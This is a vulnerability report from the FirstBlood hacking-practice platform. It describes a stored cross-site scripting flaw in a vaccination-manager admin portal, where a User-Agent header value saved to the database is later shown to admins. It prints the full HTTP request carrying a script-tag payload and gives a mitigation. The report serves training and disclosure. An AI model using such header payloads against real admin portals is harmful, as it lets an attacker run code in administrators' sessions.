FirstBlood-#794Stored XSS via User-Agent header value in /vaccination-manager/portal.php
This issue was discovered on FirstBlood v2



On 2021-10-28, panya Level 7 reported:

The vaccination manager admin portal unsafely reflects a User-Agent header's value (saved to the DB when a user sends vaccination proof via /vaccination-manager/pub/submit-vaccination-proof.php endpoint), which leads Stored XSS.

Example request:

POST /vaccination-manager/pub/submit-vaccination-proof.php HTTP/1.1
Host: 13f5cfe96d8e-panya.a.firstbloodhackers.com
Content-Length: 66604
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://13f5cfe96d8e-panya.a.firstbloodhackers.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6Ttb4gutNkKWWkV6
User-Agent: <script>alert(origin)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://13f5cfe96d8e-panya.a.firstbloodhackers.com/vaccination-manager/pub/upload-vaccination-proof.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundary6Ttb4gutNkKWWkV6
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundary6Ttb4gutNkKWWkV6
Content-Disposition: form-data; name="vaccination_proof"; filename="pepe.png"
Content-Type: image/png

‰PNG


IHDR  D  
<skiped>
------WebKitFormBoundary6Ttb4gutNkKWWkV6--

Notice that I changed the User-Agent header value to <script>alert(origin)</script>.

The script tag is reflected in the vaccination-manager's admin portal and triggers an alert with the text "https://13f5cfe96d8e-panya.a.firstbloodhackers.com".

Impact:

An attacker could execute JS code on behalf of an vaccination-manager's admin.

Mitigation:

The User-Agent header's value should be properly escaped or sanitized.

P2 High

Endpoint: /vaccination-manager/portal.php

Parameter: User-Agent

Payload: <script>alert(origin)</script>


FirstBlood ID: 29
Vulnerability Type: Stored XSS

When uploading a vaccine proof it is possible to achieve stored XSS against admins set via the user agent. As this value typically can't be user controlled the developers did not think it was 'worth' preventing against XSS.